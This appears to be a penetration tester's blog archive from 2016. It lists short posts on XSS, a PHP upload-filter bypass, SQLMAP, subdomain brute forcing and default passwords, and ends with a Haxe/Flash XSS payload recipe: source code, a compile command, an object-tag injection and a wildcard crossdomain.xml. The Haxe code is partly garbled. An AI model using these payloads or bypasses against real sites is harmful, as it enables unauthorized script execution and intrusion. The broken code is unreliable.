Friday, December 30, 2016

possible XSS execution in Javascript context

The following browser behaviour may be useful for bug bounty programs.

Thursday, December 29, 2016

bypass of php file extension blacklist for file uploads in standard ubuntu 12.04 lts LAMP setup

Weeks ago during a penetration test I bypassed a file upload filter by naming the file php. [dot].

worst virus example :)

that’s definitely the worst virus code example i have ever seen :)

Monday, December 26, 2016

how to save time using SQLMAP with file input

In the past I spent some time to recreate a request working with SQLMAP (cookies, headers, multipart forms etc).

subdomain discovery with nmap and custom subdomain files

how to discover/brute force subdomains of a domain with nmap dns-brute script and custom subdomain files.

Thursday, December 22, 2016

how to setup a rasperry pi 2 model b for wlan sniffing

The setup described below is working with a Raspberry PI 2 Model B and Whezzy as Operating System. It is not working with Raspberry Pi 3 and Jessie.

Sunday, December 4, 2016

twelve "low hanging fruits" application owners can check by themselves before ordering an penetration test.

The following 12 common security issues can easy be checked by application owners themselve before ordering a penetration test. This will not substitute the need of a penetration test but it can save time and money.

Sunday, November 6, 2016

when the switches and wlan router in a SPA hotel works with default passwords

..then its easy to get access. password "password" :) time to setup a own DNS server ;)

Monday, October 31, 2016

cipher check with

SSLLABS is good to check ciphers, but for IP adresses and non 443 ports, it does not work. orders the ciphers for each protocol (ssl.x, tls.x) in server prefered sort order.
(the red ones are weak)

Friday, October 28, 2016

Amazing, how fast chinese "hijack" your machine as proxy.

Last week during a test I configured FIDDLER to accept remote connections from internet on standard port 8888. During my tests I recognized immediatley calls from an unknown source crawling online travel agencies using my machine as proxy. My IP was one located in US.

Tuesday, October 25, 2016

checking TTL of a domain with dig

Since latest DDOS attacks on DNS servers, it can be useful to check the TTL setting for domains. The TTL set how long a DNS server caches the result of the last lookup. In stable environments one of the most common used settings is 3600 (one hour).

Thursday, October 13, 2016

mobile policy acronyms

lol today i learned a lot of strange mobile device policy acronyms.

COBO-Company Owned, Business Only.
COPE-Company Owned, Personally Enabled.
BYOD-Bring your own device.
CYOD-Choose your own device.

Monday, January 4, 2016

create a simple flash using HAXE with (dynamic) javascript as parameter

Download and install HAXE

Create the source file (xss.hx)
import flash.external.ExternalInterface;

class XSS {

public static function main() {


    var command:String = flash.Lib.current.loaderInfo.parameters.command;
    var param:String = flash.Lib.current.loaderInfo.parameters.param;, param);

Compile it
haxe XSS.hx -swf xss.swf -main XSS -swf-version 9

Inject it - 1

<object data="xss.swf">
   <param name="allowScriptAccess" value="always">
   <param name="FlashVars" value="command=alert&param=XSS%20SUCCESSFULL2">


Inject it - 2



if you load the flash file from a other domain you need to set the crossdomain.xml

<?xml version="1.0" ?>
    <allow-access-from domain="*" />

create a simple flash using HAXE with (static) javascript alert message

simple html form post example for CSRF attacks